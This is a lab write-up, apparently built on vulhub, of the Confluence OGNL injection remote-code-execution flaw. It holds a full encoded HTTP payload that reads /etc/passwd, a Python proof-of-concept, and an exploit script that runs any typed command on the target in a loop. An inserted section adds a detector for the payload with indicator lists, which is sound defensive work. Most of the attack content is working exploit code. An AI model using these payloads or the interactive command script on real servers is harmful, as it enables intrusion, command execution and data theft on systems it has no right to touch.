
Atlassian Confluence OGNL expression injection code execution vulnerability (CVE--26084)

Time: 2023-04-19 15:00:23


Environment setup:

Using vulhub, enter the vulnerability's directory and start the environment:

docker-compose up -d

Once the environment is up, open http://your-ip:8090 to reach the setup wizard. Follow the same installation steps as in the CVE--3396 environment and request a trial license. On the database information page, the PostgreSQL host is db, the database name is confluence, and the username and password are both postgres.

Vulnerability reproduction:

POST /pages/createpage-entervariables.action HTTP/1.1
Host: 192.168.33.170:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1075

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat+/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
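The request above is what a reverse proxy, WAF or access-log pipeline actually sees, and it is worth noticing what it hides: every single quote is written as \u0027 and eval is written as \u0065val, so a filter that looks for a literal quote or the word eval in the URL-decoded body matches nothing. The detector below is an added example (not code from the original post or from vulhub) that removes both encoding layers before matching, flags the OGNL quote-break pattern '+{ and a handful of Java class names that never belong in a queryString parameter, and notes when the request targets the action used in this write-up. The sample bodies are constructed for the example; the endpoint list and the indicator list are assumptions that a deployment would extend from the vendor advisory.

```python
"""Request-body detector for the OGNL injection pattern used against
Confluence in this write-up. Added example, not part of the original post.
"""
import re
import urllib.parse
from typing import List

# Action shown in the write-up. The vendor advisory covers additional
# actions that reach the same OGNL sink; this tuple is an assumption-driven
# starting point, not a complete list.
SUSPECT_PATHS = ("/pages/createpage-entervariables.action",)

# Java names that have no business inside a page-variables parameter.
INDICATORS = (
    "Class.forName",
    "ScriptEngineManager",
    "getEngineByName",
    "ProcessBuilder",
    "java.lang.Runtime",
    ".eval(",
)

# OGNL quote-break: a closing quote, '+', and an expression block, as in '+{...}+'
QUOTE_BREAK = re.compile(r"'\s*\+\s*\{")

# Java/OGNL \uXXXX escape, the second encoding layer in the payload
_UESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Constructed samples (reduced form of the request above, plus benign traffic).
MALICIOUS_BODY = (
    "queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager"
    "%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29"
    ".%5cu0065val%28%5cu0027var+p+%3d+new+java.lang.ProcessBuilder%28%29%3b%5cu0027%29%7d%2b%5cu0027"
)
BENIGN_BODY = "queryString=spaceKey%3dDOCS%26title%3dRelease+notes+%28Q2%29"
APOSTROPHE_BODY = "queryString=title%3dO%27Brien%27s+notes"  # a quote alone is not an attack


def form_decode(body: str) -> str:
    """First layer only: undo application/x-www-form-urlencoded encoding."""
    return urllib.parse.unquote_plus(body)


def unescape_unicode(value: str) -> str:
    """Second layer: resolve \\uXXXX so \\u0027 becomes ' and \\u0065val becomes eval."""
    return _UESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def scan_request(path: str, body: str) -> List[str]:
    """Return sorted, de-duplicated findings for one POST request.

    Findings are content-based, so a payload sent to an action not in
    SUSPECT_PATHS is still reported; the path match is just one more finding.
    """
    hits = set()
    if any(path.startswith(p) for p in SUSPECT_PATHS):
        hits.add("path: known OGNL-injection action")
    # parse_qs applies the first decoding layer for every parameter value
    for name, values in urllib.parse.parse_qs(body, keep_blank_values=True).items():
        for value in values:
            text = unescape_unicode(value)
            if QUOTE_BREAK.search(text):
                hits.add(f"{name}: quote-break")
            for indicator in INDICATORS:
                if indicator in text:
                    hits.add(f"{name}: {indicator}")
    return sorted(hits)


if __name__ == "__main__":
    for label, path, body in (
        ("malicious", "/pages/createpage-entervariables.action", MALICIOUS_BODY),
        ("benign", "/pages/createpage-entervariables.action", BENIGN_BODY),
        ("apostrophe", "/pages/createpage-entervariables.action", APOSTROPHE_BODY),
        ("malicious, other path", "/login.action", MALICIOUS_BODY),
    ):
        print(f"{label}: {scan_request(path, body)}")
```

Run it against a captured body and the difference between the two decoding layers is visible directly: form_decode(MALICIOUS_BODY) still contains no eval, while unescape_unicode of the same value does. A signature that only URL-decodes is therefore blind to this payload, which is the reason normalization comes before matching here.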

Writing the POC:

import requests

url = "http://192.168.33.170:8090/"
bug = "pages/createpage-entervariables.action"
# The \\u0027 / \\u0022 / \\u0065val escapes are kept literal in the Python string; the server-side OGNL evaluator resolves them
data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022echo wwwq|md5sum\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}
r = requests.post(url+bug, data=data)
if "c0f07f528bbb4eed25c97370610a7c8e" in r.text:  # output of the executed "echo wwwq|md5sum" command
    print("CVE--26084 存在")

PyCharm run result:

Writing the EXP:

import requests
from bs4 import BeautifulSoup

url = "http://192.168.33.170:8090/"
bug = "pages/createpage-entervariables.action"
# Same probe as the POC: run "echo wwwq|md5sum" and look for its hash in the response
data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022echo wwwq|md5sum\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}
r = requests.post(url+bug, data=data)
if "c0f07f528bbb4eed25c97370610a7c8e" in r.text:  # output of the executed "echo wwwq|md5sum" command
    print("CVE--26084 存在")
    while 1:
        cmd = input("请输入你要执行的命令:")
        # The command typed by the user is spliced into the same payload in place of the probe command
        data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}
        exp_res = requests.post(url+bug, data=data)
        soup = BeautifulSoup(exp_res.text, 'lxml')  # create the BeautifulSoup object
        cmd_res = soup.find("input", {'name': 'queryString'})  # extract the input tag into which the evaluated queryString is echoed
        print(str(cmd_res)[48:-6])  # print only the command output (slice strips the surrounding tag markup)

PyCharm run result:
